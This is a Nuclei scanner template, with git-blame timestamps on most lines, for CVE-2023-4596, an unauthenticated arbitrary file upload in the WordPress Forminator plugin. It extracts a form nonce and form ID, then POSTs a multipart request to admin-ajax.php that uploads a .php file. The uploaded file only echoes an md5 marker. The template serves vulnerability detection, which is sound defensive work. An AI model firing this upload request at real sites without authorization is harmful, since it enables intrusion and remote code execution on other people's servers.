2023-08-30 19:35:56 +00:00
id : CVE-2023-4596
2023-08-30 19:48:01 +00:00
2023-08-30 19:35:56 +00:00
info :
2023-09-26 18:09:38 +00:00
name : WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload
2023-08-30 19:35:56 +00:00
author : E1A
severity : critical
2023-08-30 19:48:01 +00:00
description : |
The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
2023-08-30 19:35:56 +00:00
reference :
- https://www.exploit-db.com/exploits/51664
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve
- https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php
2023-09-13 07:24:47 +00:00
- https://github.com/E1A/CVE-2023-4596
2023-09-26 18:09:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-4596
2023-08-30 19:35:56 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-4596
cwe-id : CWE-434
2023-11-18 12:52:17 +00:00
epss-score : 0.08202
2023-12-12 11:07:52 +00:00
epss-percentile : 0.93695
2023-11-07 05:20:07 +00:00
cpe : cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:*
2023-08-30 19:35:56 +00:00
metadata :
2023-09-26 18:09:38 +00:00
verified : true
2023-11-07 05:20:07 +00:00
max-request : 2
vendor : incsub
product : forminator
framework : wordpress
publicwww-query : /wp-content/plugins/Forminator
2023-12-05 09:50:33 +00:00
tags : cve,cve2023,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub
2023-08-30 19:35:56 +00:00
http :
- raw :
- |
2023-09-11 15:14:40 +00:00
GET / HTTP/1.1
2023-08-30 19:35:56 +00:00
Host : {{Hostname}}
- |
2023-09-26 18:09:38 +00:00
@timeout : 15s
2023-08-30 19:35:56 +00:00
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe
2023-09-26 18:09:38 +00:00
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition : form-data; name="textarea-1"
{{randstr}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition : form-data; name="phone-1"
{{rand_int(10)}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition : form-data; name="email-1"
test@gmail.com
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition : form-data; name="name-1"
{{randstr}}
2023-08-30 19:35:56 +00:00
------WebKitFormBoundaryBLOYSueQAdgN2PRe
2023-09-13 08:52:51 +00:00
Content-Disposition : form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
2023-08-30 19:35:56 +00:00
Content-Type : application/x-php
2023-09-26 18:09:38 +00:00
<?php echo md5('CVE-2023-4596');?>
2023-08-30 19:35:56 +00:00
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition : form-data; name="forminator_nonce"
{{forminator_nonce}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition : form-data; name="form_id"
{{form_id}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition : form-data; name="current_url"
{{BaseURL}}
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition : form-data; name="action"
forminator_submit_form_custom-forms
2023-09-26 18:09:38 +00:00
------WebKitFormBoundaryBLOYSueQAdgN2PRe
2023-08-30 19:48:01 +00:00
2023-09-26 18:09:38 +00:00
matchers-condition : and
2023-09-13 08:52:51 +00:00
matchers :
- type : word
2023-09-26 18:09:38 +00:00
part : body_1
2023-09-13 08:52:51 +00:00
words :
2023-09-26 18:09:38 +00:00
- 'Upload file</label>'
- 'forminator-field-upload'
condition : and
- type : word
part : body_2
words :
- '{"success":true'
- '"form_id":"{{form_id}}"'
- '"behav'
condition : and
- type : status
status :
- 200
2023-09-13 08:52:51 +00:00
2023-08-30 19:35:56 +00:00
extractors :
- type : regex
name : forminator_nonce
2023-09-11 15:14:40 +00:00
part : body
2023-08-30 19:35:56 +00:00
group : 1
regex :
2023-09-11 15:14:40 +00:00
- 'name="forminator_nonce" value="([a-z0-9]+)" \/>'
2023-08-30 19:35:56 +00:00
internal : true
- type : regex
name : form_id
2023-09-11 15:14:40 +00:00
part : body
2023-08-30 19:35:56 +00:00
group : 1
regex :
2023-09-11 15:14:40 +00:00
- 'name="form_id" value="([0-9]+)">'
2023-08-30 19:48:01 +00:00
internal : true
2023-12-12 12:02:03 +00:00
# digest: 4a0a00473045022100ada10e5ea850791972da3b0fef7b51c2e433d191c9693ddce85fa2cb2355c2dc022005bde1537da28f4b28f8208d6eb7e34b09b3d0800eb3272ab36992b5120131fe:922c64590222798bb761d5b6d8e72950